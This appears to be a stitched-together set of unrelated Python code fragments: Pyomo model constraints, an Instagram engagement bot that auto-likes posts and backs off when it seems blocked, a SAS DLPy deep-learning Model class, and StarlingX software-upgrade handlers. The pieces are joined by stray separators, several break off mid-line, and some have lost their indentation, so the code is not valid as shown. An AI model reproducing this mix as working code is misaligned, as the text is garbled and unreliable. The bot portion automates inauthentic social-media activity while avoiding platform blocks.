# (m.x450..m.x478), consistent with a second stage/period of the same model.
m.c1155 = Constraint(expr= m.x322 + m.x354 + m.x386 + m.x418 + m.x450 + m.x774 == 100)
m.c1156 = Constraint(expr= m.x323 + m.x355 + m.x387 + m.x419 + m.x451 + m.x775 == 0)
m.c1157 = Constraint(expr= m.x324 + m.x356 + m.x388 + m.x420 + m.x452 + m.x776 == 0)
m.c1158 = Constraint(expr= m.x325 + m.x357 + m.x389 + m.x421 + m.x453 + m.x777 == 0)
m.c1159 = Constraint(expr= m.x326 + m.x358 + m.x390 + m.x422 + m.x454 + m.x778 == 0)
m.c1160 = Constraint(expr= m.x327 + m.x359 + m.x391 + m.x423 + m.x455 + m.x779 == 100)
m.c1161 = Constraint(expr= m.x328 + m.x360 + m.x392 + m.x424 + m.x456 + m.x780 == 0)
m.c1162 = Constraint(expr= m.x329 + m.x361 + m.x393 + m.x425 + m.x457 + m.x781 == 0)
m.c1163 = Constraint(expr= - m.x322 + m.x330 + m.x334 - m.x354 + m.x362 + m.x366 - m.x386 + m.x394 + m.x398 - m.x418
                              + m.x426 + m.x430 - m.x450 + m.x458 + m.x462 + m.x782 == 25)
m.c1164 = Constraint(expr= - m.x323 + m.x331 + m.x335 - m.x355 + m.x363 + m.x367 - m.x387 + m.x395 + m.x399 - m.x419
                              + m.x427 + m.x431 - m.x451 + m.x459 + m.x463 + m.x783 == 0)
m.c1165 = Constraint(expr= - m.x324 + m.x332 + m.x336 - m.x356 + m.x364 + m.x368 - m.x388 + m.x396 + m.x400 - m.x420
                              + m.x428 + m.x432 - m.x452 + m.x460 + m.x464 + m.x784 == 0)
m.c1166 = Constraint(expr= - m.x325 + m.x333 + m.x337 - m.x357 + m.x365 + m.x369 - m.x389 + m.x397 + m.x401 - m.x421
                              + m.x429 + m.x433 - m.x453 + m.x461 + m.x465 + m.x785 == 0)
m.c1167 = Constraint(expr= - m.x326 + m.x338 + m.x342 - m.x358 + m.x370 + m.x374 - m.x390 + m.x402 + m.x406 - m.x422
                              + m.x434 + m.x438 - m.x454 + m.x466 + m.x470 + m.x786 == 0)
m.c1168 = Constraint(expr= - m.x327 + m.x339 + m.x343 - m.x359 + m.x371 + m.x375 - m.x391 + m.x403 + m.x407 - m.x423
                              + m.x435 + m.x439 - m.x455 + m.x467 + m.x471 + m.x787 == 75)
m.c1169 = Constraint(expr= - m.x328 + m.x340 + m.x344 - m.x360 + m.x372 + m.x376 - m.x392 + m.x404 + m.x408 - m.x424
                              + m.x436 + m.x440 - m.x456 + m.x468 + m.x472 + m.x788 == 0)
m.c1170 = Constraint(expr= - m.x329 + m.x341 + m.x345 - m.x361 + m.x373 + m.x377 - m.x393 + m.x405 + m.x409 - m.x425
                              + m.x437 + m.x441 - m.x457 + m.x469 + m.x473 + m.x789 == 0)
m.c1171 = Constraint(expr= - m.x330 - m.x338 + m.x346 - m.x362 - m.x370 + m.x378 - m.x394 - m.x402 + m.x410 - m.x426
                              - m.x434 + m.x442 - m.x458 - m.x466 + m.x474 + m.x790 == 0)
m.c1172 = Constraint(expr= - m.x331 - m.x339 + m.x347 - m.x363 - m.x371 + m.x379 - m.x395 - m.x403 + m.x411 - m.x427
                              - m.x435 + m.x443 - m.x459 - m.x467 + m.x475 + m.x791 == 0)
m.c1173 = Constraint(expr= - m.x332 - m.x340 + m.x348 - m.x364 - m.x372 + m.x380 - m.x396 - m.x404 + m.x412 - m.x428
                              - m.x436 + m.x444 - m.x460 - m.x468 + m.x476 + m.x792 == 50)
m.c1174 = Constraint(expr= - m.x333 - m.x341 + m.x349 - m.x365 - m.x373 + m.x381 - m.x397 - m.x405 + m.x413 - m.x429
                              - m.x437 + m.x445 - m.x461 - m.x469 + m.x477 + m.x793 == 0)
m.c1175 = Constraint(expr= - m.x334 - m.x342 + m.x350 - m.x366 - m.x374 + m.x382 - m.x398 - m.x406 + m.x414 - m.x430
                              - m.x438 + m.x446 - m.x462 - m.x470 + m.x478 + m.x794 == 0)
m.c1176 = Constraint(expr= - m.x335 - m.x343 + m.x351 | |
get_following_status(browser, 'profile',
username, person, None,
logger, logfolder)
if following == 'Following':
following = True
is_private = is_private_profile(browser, logger, following)
if (is_private is None) or (is_private is True and not following) or (
following == 'Blocked'):
return False
# Get links
links = []
main_elem = browser.find_element_by_tag_name('article')
posts_count = get_number_of_posts(browser)
attempt = 0
if posts_count is not None and amount > posts_count:
logger.info(
"You have requested to get {} posts from {}'s profile page BUT"
" there only {} posts available :D".format(amount, person,
posts_count))
amount = posts_count
while len(links) < amount:
initial_links = links
browser.execute_script(
"window.scrollTo(0, document.body.scrollHeight);")
# update server calls after a scroll request
update_activity()
sleep(0.66)
# using `extend` or `+=` results reference stay alive which affects
# previous assignment (can use `copy()` for it)
links = links + get_links(browser, person, logger, media, main_elem)
links = sorted(set(links), key=links.index)
if len(links) == len(initial_links):
if attempt >= 7:
logger.info(
"There are possibly less posts than {} in {}'s profile "
"page!".format(
amount, person))
break
else:
attempt += 1
else:
attempt = 0
if randomize is True:
random.shuffle(links)
return links[:amount]
def check_link(browser, post_link, dont_like, mandatory_words,
               mandatory_language, mandatory_character,
               is_mandatory_character, check_character_set, ignore_if_contains,
               logger):
    """
    Check the given link if it is appropriate
    :param browser: The selenium webdriver instance
    :param post_link: URL of the post to inspect
    :param dont_like: hashtags of inappropriate phrases
    :param mandatory_words: words of appropriate phrases
    :param mandatory_language: if truthy, image text must pass check_character_set
    :param mandatory_character: NOTE(review): not referenced in this function;
        presumably consumed inside check_character_set -- confirm with callers
    :param is_mandatory_character: NOTE(review): also unreferenced here
    :param check_character_set: callable that validates the text's character set
    :param ignore_if_contains: words that whitelist a post unconditionally
    :param logger: the logger instance
    :return: tuple of
        boolean: True if inappropriate,
        string: the username,
        boolean: True if it is video media,
        string: the message if inappropriate else 'None',
        string: set the scope of the return value
    """
    # Check URL of the webpage, if it already is post's page, then do not
    # navigate to it again
    web_address_navigator(browser, post_link)

    # Check if the Post is Valid/Exists
    try:
        post_page = browser.execute_script(
            "return window._sharedData.entry_data.PostPage")
    except WebDriverException:  # handle the possible `entry_data` error
        try:
            browser.execute_script("location.reload()")
            update_activity()
            post_page = browser.execute_script(
                "return window._sharedData.entry_data.PostPage")
        except WebDriverException:
            post_page = None

    if post_page is None:
        logger.warning(
            'Unavailable Page: {}'.format(post_link.encode('utf-8')))
        return True, None, None, 'Unavailable Page', "Failure"

    # Gets the description of the post's link and checks for the dont_like tags
    # FIX: location_name must exist on both branches; previously it was only
    # assigned on the graphql path, causing a NameError further below for
    # legacy (non-graphql) posts
    location_name = None
    graphql = 'graphql' in post_page[0]
    if graphql:
        media = post_page[0]['graphql']['shortcode_media']
        is_video = media['is_video']
        user_name = media['owner']['username']
        image_text = media['edge_media_to_caption']['edges']
        image_text = image_text[0]['node']['text'] if image_text else None
        location = media['location']
        location_name = location['name'] if location else None
        # FIX: the previous script only computed owner_comments when the
        # comment list was undefined (i.e. empty) and returned null otherwise,
        # so the post owner's comments were never collected; compute them
        # unconditionally after defaulting an undefined list to []
        owner_comments = browser.execute_script('''
            latest_comments = window._sharedData.entry_data.PostPage[
                0].graphql.shortcode_media.edge_media_to_comment.edges;
            if (latest_comments === undefined) {
                latest_comments = Array();
            }
            owner_comments = latest_comments
                .filter(item => item.node.owner.username == arguments[0])
                .map(item => item.node.text)
                .reduce((item, total) => item + '\\n' + total, '');
            return owner_comments;
        ''', user_name)
    else:
        media = post_page[0]['media']
        is_video = media['is_video']
        user_name = media['owner']['username']
        image_text = media['caption']
        # FIX: same inverted-condition repair as on the graphql branch above
        owner_comments = browser.execute_script('''
            latest_comments = window._sharedData.entry_data.PostPage[
                0].media.comments.nodes;
            if (latest_comments === undefined) {
                latest_comments = Array();
            }
            owner_comments = latest_comments
                .filter(item => item.user.username == arguments[0])
                .map(item => item.text)
                .reduce((item, total) => item + '\\n' + total, '');
            return owner_comments;
        ''', user_name)

    if owner_comments == '':
        owner_comments = None

    # Append owner comments to description as it might contain further tags
    if image_text is None:
        image_text = owner_comments
    elif owner_comments:
        image_text = image_text + '\n' + owner_comments

    # If the image still has no description gets the first comment
    if image_text is None:
        if graphql:
            image_text = media['edge_media_to_comment']['edges']
            image_text = image_text[0]['node']['text'] if image_text else None
        else:
            image_text = media['comments']['nodes']
            image_text = image_text[0]['text'] if image_text else None
    if image_text is None:
        image_text = "No description"

    logger.info('Image from: {}'.format(user_name.encode('utf-8')))
    logger.info('Link: {}'.format(post_link.encode('utf-8')))
    logger.info('Description: {}'.format(image_text.encode('utf-8')))

    # Check if mandatory character set, before adding the location to the text
    if mandatory_language:
        if not check_character_set(image_text):
            return True, user_name, is_video, 'Mandatory language not ' \
                                              'fulfilled', "Not mandatory " \
                                                           "language"

    # Append location to image_text so we can search through both in one go
    if location_name:
        logger.info('Location: {}'.format(location_name.encode('utf-8')))
        image_text = image_text + '\n' + location_name

    if mandatory_words:
        if not any((word in image_text for word in mandatory_words)):
            return True, user_name, is_video, 'Mandatory words not ' \
                                              'fulfilled', "Not mandatory " \
                                                           "likes"

    # FIX: previously this lowercased into a *list of characters*
    # ([x.lower() for x in image_text]), so multi-character words in
    # ignore_if_contains could never match; compare lowercased strings instead
    image_text_lower = image_text.lower()
    ignore_if_contains_lower = [x.lower() for x in ignore_if_contains]
    if any((word in image_text_lower for word in ignore_if_contains_lower)):
        return False, user_name, is_video, 'None', "Pass"

    # Build one regex per undesired word; '[' / ']' prefixes anchor the word
    # to the start / end of a hashtag respectively
    dont_like_regex = []
    for dont_likes in dont_like:
        if dont_likes.startswith("#"):
            dont_like_regex.append(dont_likes + "([^\d\w]|$)")
        elif dont_likes.startswith("["):
            dont_like_regex.append("#" + dont_likes[1:] + "[\d\w]+([^\d\w]|$)")
        elif dont_likes.startswith("]"):
            dont_like_regex.append("#[\d\w]+" + dont_likes[1:] + "([^\d\w]|$)")
        else:
            dont_like_regex.append(
                "#[\d\w]*" + dont_likes + "[\d\w]*([^\d\w]|$)")

    for dont_likes_regex in dont_like_regex:
        quash = re.search(dont_likes_regex, image_text, re.IGNORECASE)
        if quash:
            quashed = \
                (((quash.group(0)).split('#')[1]).split(' ')[0]).split('\n')[
                    0].encode(
                    'utf-8')  # dismiss possible space and newlines
            iffy = ((re.split(r'\W+', dont_likes_regex))[
                        3] if dont_likes_regex.endswith(
                '*([^\\d\\w]|$)') else  # 'word' without format
                    (re.split(r'\W+', dont_likes_regex))[
                        1] if dont_likes_regex.endswith(
                        '+([^\\d\\w]|$)') else  # '[word'
                    (re.split(r'\W+', dont_likes_regex))[
                        3] if dont_likes_regex.startswith(
                        '#[\\d\\w]+') else  # ']word'
                    (re.split(r'\W+', dont_likes_regex))[1])  # '#word'
            inapp_unit = 'Inappropriate! ~ contains "{}"'.format(
                quashed if iffy == quashed else
                '" in "'.join([str(iffy), str(quashed)]))
            return True, user_name, is_video, inapp_unit, "Undesired word"

    return False, user_name, is_video, 'None', "Success"
def like_image(browser, username, blacklist, logger, logfolder):
    """Likes the browser opened image"""
    # check action availability
    if quota_supervisor("likes") == "jump":
        return False, "jumped"

    like_xpath = "//section/span/button/span[@aria-label='Like']"
    unlike_xpath = "//section/span/button/span[@aria-label='Unlike']"

    # look for the 'Like' button first
    like_buttons = browser.find_elements_by_xpath(like_xpath)
    if len(like_buttons) == 1:
        # sleep real quick right before clicking the element
        sleep(2)
        click_element(browser, like_buttons[0])
        # success is confirmed by the button flipping over to 'Unlike'
        if len(browser.find_elements_by_xpath(unlike_xpath)) == 1:
            logger.info('--> Image Liked!')
            update_activity('likes')
            if blacklist['enabled'] is True:
                add_user_to_blacklist(
                    username, blacklist['campaign'], 'liked', logger, logfolder)
            # get the post-like delay time to sleep
            sleep(get_action_delay("like"))
            return True, "success"
        # the like did not register; back off in case of a temporary block
        logger.info('--> Image was not able to get Liked! maybe blocked ?')
        sleep(120)
    elif len(browser.find_elements_by_xpath(unlike_xpath)) == 1:
        logger.info('--> Image already liked!')
        return False, "already liked"

    logger.info('--> Invalid Like Element!')
    return False, "invalid element"
def get_tags(browser, url):
    """Gets all the tags of the given description in the url"""
    # navigate only if the browser is not already on the target page
    web_address_navigator(browser, url)

    uses_graphql = browser.execute_script(
        "return ('graphql' in window._sharedData.entry_data.PostPage[0])")
    if uses_graphql:
        image_text = browser.execute_script(
            "return window._sharedData.entry_data.PostPage[0].graphql."
            "shortcode_media.edge_media_to_caption.edges[0].node.text")
    else:
        image_text = browser.execute_script(
            "return window._sharedData.entry_data."
            "PostPage[0].media.caption.text")
    # every '#word' token in the caption counts as a tag
    return findall(r'#\w*', image_text)
def get_links(browser, page, logger, media, element):
    """
    Get image links in scope from hashtag, location and other pages.

    :param page: page name, used only for the log message
    :param media: collection of link texts considered valid media labels
    :param element: container web element whose <a> children are scanned
    :return: list of href strings (possibly empty)
    """
    link_elems = element.find_elements_by_tag_name('a')
    sleep(2)
    links = []
    try:
        if link_elems:
            new_links = [link_elem.get_attribute('href') for link_elem in
                         link_elems
                         if link_elem and link_elem.text in media]
            links.extend(new_links)
        else:
            logger.info("'{}' page does not contain a picture".format(page))
    except Exception as e:
        # FIX: previously caught BaseException, which also swallowed
        # KeyboardInterrupt/SystemExit; Exception is the widest sane net here
        logger.error("link_elems error {}".format(str(e)))
    return links
def verify_liking(browser, max, min, logger):
    """ Get the amount of existing likes on the post and compare it against
    the max & min bounds defined by the user """
    # same JS snippet for both the direct read and the post-reload retry
    read_count_script = (
        "return window._sharedData.entry_data."
        "PostPage[0].graphql.shortcode_media.edge_media_preview_like"
        ".count")
    try:
        likes_count = browser.execute_script(read_count_script)
    except WebDriverException:
        try:
            browser.execute_script("location.reload()")
            update_activity()
            likes_count = browser.execute_script(read_count_script)
        except WebDriverException:
            # last resort: scrape the visible counter from the page
            try:
                likes_count = (browser.find_element_by_css_selector(
                    "section._1w76c._nlmjy > div > a > span").text)
                if likes_count:
                    likes_count = format_number(likes_count)
                else:
                    logger.info(
                        "Failed to check likes' count ~empty string\n")
                    return True
            except NoSuchElementException:
                logger.info("Failed to check likes' count\n")
                return True

    if max is not None and likes_count > max:
        logger.info(
            "Not liked this post! ~more likes exist off maximum limit at "
            "{}".format(likes_count))
        return False
    if min is not None and likes_count < min:
        logger.info(
            "Not liked this post! ~less likes exist off minumum limit "
            "at {}".format(likes_count)
        )
        return False
    return True
def like_comment(browser, original_comment_text, logger):
""" Like the given comment """
comments_block_XPath = "//div/div/h3/../../../.." # quite an efficient
# location path
try:
comments_block = browser.find_elements_by_xpath(comments_block_XPath)
for comment_line in comments_block:
comment_elem = comment_line.find_elements_by_tag_name("span")[0]
comment = extract_text_from_element(comment_elem)
if comment and (comment == original_comment_text):
# like the given comment
comment_like_button = comment_line.find_element_by_tag_name(
"button")
click_element(browser, comment_like_button)
# verify if like succeeded by waiting until the like button
# element goes stale..
button_change = explicit_wait(browser, "SO",
[comment_like_button], logger, 7,
False)
if button_change:
logger.info("--> Liked the comment!")
sleep(random.uniform(1, 2))
return True, | |
# Source: jld23/python-dlpy -- dlpy/model.py
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' The Model class adds training, evaluation, tuning and feature analysis routines to a Network '''
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import collections
import sys
from .utils import image_blocksize, unify_keys, input_table_check, random_name, check_caslib, caslibify
from .utils import filter_by_image_id, filter_by_filename, isnotebook
from dlpy.timeseries import TimeseriesTable
from dlpy.timeseries import _get_first_obs, _get_last_obs, _combine_table, _prepare_next_input
from dlpy.utils import DLPyError, Box, DLPyDict
from dlpy.lr_scheduler import _LRScheduler, FixedLR, StepLR, FCMPLR
from dlpy.network import Network
class Model(Network):
# Class-level defaults for state accumulated over the model's lifetime.
# NOTE(review): these are presumably populated by fit/evaluate/score-style
# methods -- the assigning code lies outside this chunk, confirm there.
valid_res = None
feature_maps = None
valid_conf_mat = None
valid_score = None
# number of epochs trained so far (starts at zero for a fresh model)
n_epochs = 0
training_history = None
model_explain_table = None
valid_res_tbl = None
model_ever_trained = False
train_tbl = None
valid_tbl = None
# CAS message level used when scoring
score_message_level = 'note'
def change_labels(self, label_file, id_column, label_column):
    '''
    Overrides the labels already in the model

    The label_file should be a csv file that has two columns: 1) id
    column that contains ids starting from 0 and 2) label column that
    contains the labels. This file should also have header columns
    and those should be passed to this function (i.e., id_column and
    label_column)

    Parameters
    ----------
    label_file : string
        Specifies the name of the file that contains the new labels.
    id_column : string
        Specifies the name of the id column in label_file.
    label_column : string
        Specifies the name of the label column in label file.

    Raises
    ------
    DLPyError
        If the model has no weights yet, or the dllabeltarget action fails.
    '''
    if self.model_weights is None:
        raise DLPyError('We do not have any weights yet')

    temp_name = random_name('new_label_table', 6)
    temp_model_name = random_name('new_weights_table', 6)
    labels = pd.read_csv(label_file, skipinitialspace=True, index_col=False)
    # upload the csv as a CAS table with explicit column types
    self.conn.upload_frame(labels, casout=dict(name=temp_name, replace=True),
                           importoptions={'vars': [
                               {'name': id_column, 'type': 'int64'},
                               {'name': label_column, 'type': 'char', 'length': 20}
                           ]})
    rt = self._retrieve_('deeplearn.dllabeltarget', initWeights=self.model_weights,
                         modelTable=self.model_table, modelWeights=temp_model_name,
                         labelTable=temp_name)
    if rt.severity == 0:
        self.model_weights = self.conn.CASTable(temp_model_name)
    else:
        for m in rt.messages:
            print(m)
        # FIX: the failure branch previously said something went "well"
        raise DLPyError('Seems like something went wrong while changing the labels')
def get_model_info(self):
    '''
    Return the information about the model table

    Returns
    -------
    :class:`CASResults`
    '''
    # thin wrapper around the deeplearn.modelinfo CAS action
    action_name = 'deeplearn.modelinfo'
    return self._retrieve_(action_name, modelTable=self.model_table)
def fit(self, data, inputs=None, target=None, data_specs=None, mini_batch_size=1, max_epochs=5, log_level=3,
lr=0.01, optimizer=None, nominals=None, texts=None, target_sequence=None, sequence=None, text_parms=None,
valid_table=None, valid_freq=1, gpu=None, attributes=None, weight=None, seed=0, record_seed=0,
missing='mean', target_missing='mean', repeat_weight_table=False, force_equal_padding=None,
save_best_weights=False, n_threads=None, target_order='ascending'):
"""
Fitting a deep learning model.
Note that this function surfaces several parameters from other parameters. For example,
while learning rate is a parameter of Solver (that is a parameter of Optimizer), it is leveled up
so that our users can easily set learning rate without changing the default optimizer and solver.
If a non-default solver or optimizer is passed, then these leveled-up
parameters will be ignored - even they are set - and the ones coming from
the custom solver and custom optimizer will be used. In addition to learning_rate (lr),
max_epochs and log_level are another examples of such parameters.
Parameters
----------
data : string
This is the input data. It might be a string that is the
name of a cas table. Alternatively, this might be a cas table.
inputs : string or list-of-strings, optional
Specifies the input variables to use in the analysis.
target : string or list-of-strings, optional
Specifies the target sequence variables to use in the analysis.
data_specs : :class:`DataSpec`, optional
Specifies the parameters for the multiple input cases.
mini_batch_size : int, optional
Specifies the number of observations per thread in a
mini-batch. You can use this parameter to control the number of
observations that the action uses on each worker for each thread
to compute the gradient prior to updating the weights. Larger
values use more memory. When synchronous SGD is used (the
default), the total mini-batch size is equal to
miniBatchSize * number of threads * number of workers. When
asynchronous SGD is used (by specifying the elasticSyncFreq
parameter), each worker trains its own local model. In this case,
the total mini-batch size for each worker is
miniBatchSize * number of threads.
max_epochs : int, optional
specifies the maximum number of epochs. For SGD with a
single-machine server or a session that uses one worker on a
distributed server, one epoch is reached when the action passes
through the data one time. For a session that uses more than one
worker, one epoch is reached when all the workers exchange the
weights with the controller one time. The syncFreq parameter
specifies the number of times each worker passes through the
data before exchanging weights with the controller. For L-BFGS
with full batch, each L-BFGS iteration might process more than
one epoch, and final number of epochs might exceed the maximum
number of epochs.
log_level : int, optional
Specifies how progress messages are sent to the client. The
default value, 0, indicates that no messages are sent. Specify 1
to receive start and end messages. Specify 2 to include the
iteration history.
lr : double, optional
Specifies the learning rate.
optimizer : :class:`Optimizer`, optional
Specifies the parameters for the optimizer.
nominals : string or list-of-strings, optional
Specifies the nominal input variables to use in the analysis.
texts : string or list-of-strings, optional
Specifies the character variables to treat as raw text.
These variables must be specified in the inputs parameter.
target_sequence : string or list-of-strings, optional
Specifies the target sequence variables to use in the analysis.
sequence : :class:`Sequence`, optional
Specifies the settings for sequence data.
text_parms : :class:`TextParms`, optional
Specifies the parameters for the text inputs.
valid_table : string or CASTable, optional
Specifies the table with the validation data. The validation
table must have the same columns and data types as the training table.
valid_freq : int, optional
Specifies the frequency for scoring the validation table.
gpu : :class:`Gpu`, optional
When specified, the action uses graphical processing unit hardware.
The simplest way to use GPU processing is to specify "gpu=1".
In this case, the default values of other GPU parameters are used.
Setting gpu=1 enables all available GPU devices for use. Setting
gpu=0 disables GPU processing.
attributes : string or list-of-strings, optional
Specifies temporary attributes, such as a format, to apply to
input variables.
weight : string, optional
Specifies the variable/column name in the input table containing the
prior weights for the observation.
seed : double, optional
specifies the random number seed for the random number generator
in SGD. The default value, 0, and negative values indicate to use
random number streams based on the computer clock. Specify a value
that is greater than 0 for a reproducible random number sequence.
record_seed : double, optional
specifies the random number seed for the random record selection
within a worker. The default value 0 disables random record selection.
Records are read as they are laid out in memory.
Negative values indicate to use random number streams based on the
computer clock.
missing : string, optional
Specifies the policy for replacing missing values with imputed values.
Valid Values: MAX, MIN, MEAN, NONE
Default: MEAN
target_missing : string, optional
Specifies the policy for replacing target missing values with
imputed values.
Valid Values: MAX, MIN, MEAN, NONE
Default: MEAN
repeat_weight_table : bool, optional
Replicates the entire weight table on each worker node when saving
weights.
Default: False
force_equal_padding : bool, optional
For convolution or pooling layers, this setting forces left padding
to equal right padding, and top padding to equal bottom padding.
This setting might result in an output image that is
larger than the input image.
Default: False
save_best_weights : bool, optional
When set to True, it keeps the weights that provide the smallest
loss error.
n_threads : int, optional
Specifies | |
# Check if there is an upgrade in progress
try:
upgrade = self.dbapi.software_upgrade_get_one()
except exception.NotFound:
# No upgrade in progress
pass
else:
# Check if controller-1 has finished its data migration
if (host.hostname == constants.CONTROLLER_1_HOSTNAME and
host_upgrade.software_load == upgrade.to_load and
upgrade.state == constants.UPGRADE_DATA_MIGRATION_COMPLETE):
LOG.info("Finished upgrade of %s" %
constants.CONTROLLER_1_HOSTNAME)
# Update upgrade state
upgrade_update = {
'state': constants.UPGRADE_UPGRADING_CONTROLLERS}
self.dbapi.software_upgrade_update(upgrade.uuid,
upgrade_update)
if (host.hostname == constants.CONTROLLER_0_HOSTNAME and
host_upgrade.software_load == upgrade.to_load):
# Clear VIM upgrade flag once controller_0 has been upgraded
# This allows VM management
try:
vim_api.set_vim_upgrade_state(host, False)
except Exception as e:
LOG.exception(e)
raise exception.SysinvException(_(
"Failure clearing VIM host upgrade state"))
# If we are in the upgrading controllers state and controller-0
# is running the new release, update the upgrade state
if upgrade.state == constants.UPGRADE_UPGRADING_CONTROLLERS:
upgrade_update = {
'state': constants.UPGRADE_UPGRADING_HOSTS}
self.dbapi.software_upgrade_update(upgrade.uuid,
upgrade_update)
def start_upgrade(self, context, upgrade):
    """ Start the upgrade

    Extracts the to-release packages, prepares the system for upgrade
    and, for duplex systems, raises the upgrade-in-progress alarm and
    moves the upgrade to UPGRADE_STARTED. For simplex systems the work
    is handed off to the agent (see complete_simplex_backup), so this
    method returns early without raising the alarm.

    :param context: request context.
    :param upgrade: the software_upgrade DB object.
    """
    # Resolve from/to load records into software version strings.
    from_load = self.dbapi.load_get(upgrade.from_load)
    from_version = from_load.software_version
    to_load = self.dbapi.load_get(upgrade.to_load)
    to_version = to_load.software_version
    controller_0 = self.dbapi.ihost_get_by_hostname(
        constants.CONTROLLER_0_HOSTNAME)

    # Prepare for upgrade
    LOG.info("Preparing for upgrade from release: %s to release: %s" %
             (from_version, to_version))
    try:
        # Extract N+1 packages necessary for installation of controller-1
        # (ie. installer images, kickstarts)
        subprocess.check_call(['/usr/sbin/upgrade-start-pkg-extract',
                               '-r', to_version])
        if tsc.system_mode == constants.SYSTEM_MODE_SIMPLEX:
            # Simplex: the agent collects the upgrade data; the alarm and
            # UPGRADE_STARTED transition happen in complete_simplex_backup.
            LOG.info("Generating agent request to create simplex upgrade "
                     "data")
            software_upgrade = self.dbapi.software_upgrade_get_one()
            rpcapi = agent_rpcapi.AgentAPI()
            rpcapi.create_simplex_backup(context, software_upgrade)
            return
        else:
            i_system = self.dbapi.isystem_get_one()
            upgrades_management.prepare_upgrade(
                from_version, to_version, i_system)
            LOG.info("Finished upgrade preparation")
    except Exception:
        # Any preparation failure: roll back, destroy the record, re-raise.
        LOG.exception("Upgrade preparation failed")
        with excutils.save_and_reraise_exception():
            if tsc.system_mode != constants.SYSTEM_MODE_SIMPLEX:
                vim_api.set_vim_upgrade_state(controller_0, False)
            upgrades_management.abort_upgrade(from_version, to_version,
                                              upgrade)
            # Delete upgrade record
            self.dbapi.software_upgrade_destroy(upgrade.uuid)

    # Raise alarm to show an upgrade is in progress
    entity_instance_id = "%s=%s" % (fm_constants.FM_ENTITY_TYPE_HOST,
                                    constants.CONTROLLER_HOSTNAME)
    fault = fm_api.Fault(
        alarm_id=fm_constants.FM_ALARM_ID_UPGRADE_IN_PROGRESS,
        alarm_state=fm_constants.FM_ALARM_STATE_SET,
        entity_type_id=fm_constants.FM_ENTITY_TYPE_HOST,
        entity_instance_id=entity_instance_id,
        severity=fm_constants.FM_ALARM_SEVERITY_MINOR,
        reason_text="System Upgrade in progress.",
        # operational
        alarm_type=fm_constants.FM_ALARM_TYPE_7,
        # congestion
        probable_cause=fm_constants.ALARM_PROBABLE_CAUSE_8,
        proposed_repair_action="No action required.",
        service_affecting=False)
    fm_api.FaultAPIs().set_fault(fault)

    self.dbapi.software_upgrade_update(
        upgrade.uuid, {'state': constants.UPGRADE_STARTED})
def activate_upgrade(self, context, upgrade):
    """Activate the upgrade. Generate and apply new manifests.
    """
    # TODO Move upgrade methods to another file
    from_version = self.dbapi.load_get(upgrade.from_load).software_version
    to_version = self.dbapi.load_get(upgrade.to_load).software_version

    # Record that activation is underway before doing any work.
    self.dbapi.software_upgrade_update(
        upgrade.uuid, {'state': constants.UPGRADE_ACTIVATING})

    # Ask upgrade management to activate the upgrade
    try:
        upgrades_management.activate_upgrade(
            from_version, to_version, self.dbapi.isystem_get_one())
    except Exception:
        LOG.exception("Upgrade activation failed")
        with excutils.save_and_reraise_exception():
            # mark the activation as failed. The intention
            # is for the user to retry activation once they
            # have resolved the cause for failure
            self.dbapi.software_upgrade_update(
                upgrade.uuid,
                {'state': constants.UPGRADE_ACTIVATION_FAILED})
    else:
        LOG.info("Finished upgrade activation")
def complete_upgrade(self, context, upgrade, state):
    """ Complete the upgrade

    Handles both the normal completion path and the abort /
    abort-rollback path, depending on *state*. In both cases the
    upgrade-in-progress alarm is cleared at the end.

    :param context: request context.
    :param upgrade: the software_upgrade DB object.
    :param state: UPGRADE_ABORTING / UPGRADE_ABORTING_ROLLBACK for the
                  abort path; anything else takes the completion path.
    :raises SysinvException: if the upgrade is not in the expected state
                             or the VIM upgrade state cannot be reset.
    """
    from_load = self.dbapi.load_get(upgrade.from_load)
    from_version = from_load.software_version
    to_load = self.dbapi.load_get(upgrade.to_load)
    to_version = to_load.software_version
    controller_0 = self.dbapi.ihost_get_by_hostname(
        constants.CONTROLLER_0_HOSTNAME)

    # TODO: This code is only useful for supporting R5 to R6 upgrades.
    # Remove in future release.
    # update crushmap and remove cache-tier on upgrade
    if from_version == tsc.SW_VERSION_1803:
        ceph_backend = StorageBackendConfig.get_backend(
            self.dbapi, constants.CINDER_BACKEND_CEPH)
        if ceph_backend and ceph_backend.state == constants.SB_STATE_CONFIGURED:
            try:
                response, body = self._ceph_api.osd_crush_rule_rm(
                    "cache_tier_ruleset", body='json')
                if response.ok:
                    LOG.info("Successfully removed cache_tier_ruleset "
                             "[ceph osd crush rule rm cache_tier_ruleset]")
                    try:
                        response, body = self._ceph_api.osd_crush_remove(
                            "cache-tier", body='json')
                        if response.ok:
                            LOG.info("Successfully removed cache_tier "
                                     "[ceph osd crush remove cache-tier]")
                    except exception.CephFailure:
                        # Best-effort cleanup: log and continue.
                        LOG.warn("Failed to remove bucket cache-tier from crushmap")
            except exception.CephFailure:
                # Best-effort cleanup: log and continue.
                LOG.warn("Failed to remove rule cache-tier from crushmap")

    if state in [constants.UPGRADE_ABORTING,
                 constants.UPGRADE_ABORTING_ROLLBACK]:
        # Abort path: the upgrade must already be in ABORT_COMPLETING.
        if upgrade.state != constants.UPGRADE_ABORT_COMPLETING:
            raise exception.SysinvException(
                _("Unable to complete upgrade-abort: Upgrade not in %s "
                  "state.") % constants.UPGRADE_ABORT_COMPLETING)
        LOG.info(
            "Completing upgrade abort from release: %s to release: %s" %
            (from_version, to_version))
        upgrades_management.abort_upgrade(from_version, to_version, upgrade)

        # BUGFIX: this condition previously tested
        # tsc.system_type == constants.SYSTEM_MODE_DUPLEX, which compares
        # the system *type* to a system *mode* constant and - combined
        # with the TIS_AIO_BUILD check on the same variable - could never
        # be true. The intended check is on tsc.system_mode.
        if (tsc.system_mode == constants.SYSTEM_MODE_DUPLEX and
                tsc.system_type == constants.TIS_AIO_BUILD and
                state == constants.UPGRADE_ABORTING_ROLLBACK):
            # For AIO Case, VM goes into no state when Controller-0 becomes active
            # after swact. nova clean up will fail the instance and restart
            # nova-compute service
            LOG.info("Calling nova cleanup")
            with open(os.devnull, "w") as fnull:
                try:
                    subprocess.check_call(["systemctl", "start", "nova-cleanup"],
                                          stdout=fnull,
                                          stderr=fnull)
